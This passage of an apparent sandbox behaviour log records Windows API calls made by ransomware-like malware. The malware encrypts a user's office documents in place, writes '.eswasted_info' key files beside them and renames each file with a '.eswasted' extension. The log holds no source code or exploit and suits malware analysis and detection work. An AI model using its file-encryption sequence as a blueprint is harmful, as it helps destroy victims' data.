pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.787] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qFAW.xlsx") returned 53 [0076.787] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x274) returned 0x4e1ab8 [0076.787] lstrcpyW (in: lpString1=0x4e1b22, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.787] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.787] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.788] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.788] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qFAW.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qfaw.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.789] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.790] SetEndOfFile (hFile=0xfc) returned 1 [0076.790] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.790] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.790] lstrcpyW (in: lpString1=0x4e1b22, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qFAW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qfaw.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qFAW.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qfaw.xlsx.eswasted")) returned 1 [0076.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qFAW.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qfaw.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0076.791] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0076.791] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x8bf0 [0076.791] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8bf0) returned 0x2d0000 [0076.791] CloseHandle (hObject=0x118) returned 1 [0076.798] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.799] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.799] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.799] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.799] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.799] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.808] SetEndOfFile (hFile=0xfc) returned 1 [0076.810] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.810] CloseHandle (hObject=0xfc) returned 1 [0076.812] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.812] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4df430 | out: hHeap=0x4a0000) returned 1 [0076.812] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.813] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.813] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnTZ7dc LKP.csv") returned 59 [0076.813] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x280) returned 0x4e1ab8 [0076.813] lstrcpyW (in: lpString1=0x4e1b2e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.813] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.813] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.814] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.814] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnTZ7dc LKP.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qntz7dc lkp.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.815] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.816] SetEndOfFile (hFile=0xfc) returned 1 [0076.816] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.816] lstrcpyW (in: lpString1=0x4e1b2e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnTZ7dc LKP.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qntz7dc lkp.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnTZ7dc LKP.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qntz7dc lkp.csv.eswasted")) returned 1 [0076.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnTZ7dc LKP.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qntz7dc lkp.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.817] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0076.817] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x15827 [0076.817] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15827) returned 0xb10000 [0076.817] CloseHandle (hObject=0x120) returned 1 [0076.823] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.824] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.824] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.824] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.825] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.825] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.974] SetEndOfFile (hFile=0xfc) returned 1 [0076.976] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.976] CloseHandle (hObject=0xfc) returned 1 [0076.977] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.977] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec458 | out: hHeap=0x4a0000) returned 1 [0076.977] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.978] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.978] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\szTgF_cV-qrYu8.pptx") returned 63 [0076.978] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x288) returned 0x4e1ab8 [0076.978] lstrcpyW (in: lpString1=0x4e1b36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.978] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.978] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.979] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.979] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\szTgF_cV-qrYu8.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sztgf_cv-qryu8.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.980] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.980] SetEndOfFile (hFile=0xfc) returned 1 [0076.981] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.981] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.981] lstrcpyW (in: lpString1=0x4e1b36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\szTgF_cV-qrYu8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sztgf_cv-qryu8.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\szTgF_cV-qrYu8.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sztgf_cv-qryu8.pptx.eswasted")) returned 1 [0076.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\szTgF_cV-qrYu8.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sztgf_cv-qryu8.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0076.982] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0076.982] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xe428 [0076.982] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe428) returned 0x2d0000 [0076.982] CloseHandle (hObject=0x118) returned 1 [0076.986] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.986] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.986] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.986] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.987] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.987] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.997] SetEndOfFile (hFile=0xfc) returned 1 [0077.363] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0077.364] CloseHandle (hObject=0xfc) returned 1 [0077.366] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0077.366] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f2020 | out: hHeap=0x4a0000) returned 1 [0077.366] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0077.367] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0077.367] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TgkLQXsEM.docx") returned 58 [0077.367] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27e) returned 0x4e1ab8 [0077.367] lstrcpyW (in: lpString1=0x4e1b2c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.368] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0077.368] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0077.368] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0077.368] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TgkLQXsEM.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tgklqxsem.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.370] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.371] SetEndOfFile (hFile=0xfc) returned 1 [0077.371] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.371] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0077.371] lstrcpyW (in: lpString1=0x4e1b2c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TgkLQXsEM.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tgklqxsem.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TgkLQXsEM.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tgklqxsem.docx.eswasted")) returned 1 [0077.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TgkLQXsEM.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tgklqxsem.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.518] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0077.518] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x59fb [0077.518] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x59fb) returned 0x2d0000 [0077.518] CloseHandle (hObject=0x110) returned 1 [0077.521] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0077.521] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0077.521] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.521] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0077.522] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0077.522] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.532] SetEndOfFile (hFile=0xfc) returned 1 [0077.534] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.534] CloseHandle (hObject=0xfc) returned 1 [0077.536] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0077.536] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f3f48 | out: hHeap=0x4a0000) returned 1 [0077.536] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0077.537] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0077.537] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.537] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaOM7dvrmefA8.rtf") returned 61 [0077.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4e1ab8 [0077.537] lstrcpyW (in: lpString1=0x4e1b32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0077.537] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0077.538] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0077.538] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaOM7dvrmefA8.rtf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waom7dvrmefa8.rtf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.699] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.700] SetEndOfFile (hFile=0xfc) returned 1 [0077.700] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.700] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.700] lstrcpyW (in: lpString1=0x4e1b32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaOM7dvrmefA8.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waom7dvrmefa8.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaOM7dvrmefA8.rtf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waom7dvrmefa8.rtf.eswasted")) returned 1 [0077.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaOM7dvrmefA8.rtf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waom7dvrmefa8.rtf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0077.701] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.701] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xc044 [0077.701] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc044) returned 0x2d0000 [0077.701] CloseHandle (hObject=0x118) returned 1 [0077.705] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0077.706] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0077.706] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.706] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0077.707] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0077.707] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.715] SetEndOfFile (hFile=0xfc) returned 1 [0077.717] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.718] CloseHandle (hObject=0xfc) returned 1 [0077.719] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0077.719] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f20f8 | out: hHeap=0x4a0000) returned 1 [0077.719] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0077.720] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0077.720] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XzdNYU1.rtf") returned 55 [0077.720] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4e1ab8 [0077.720] lstrcpyW (in: lpString1=0x4e1b26, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.720] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0077.720] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0077.721] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0077.721] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XzdNYU1.rtf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xzdnyu1.rtf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 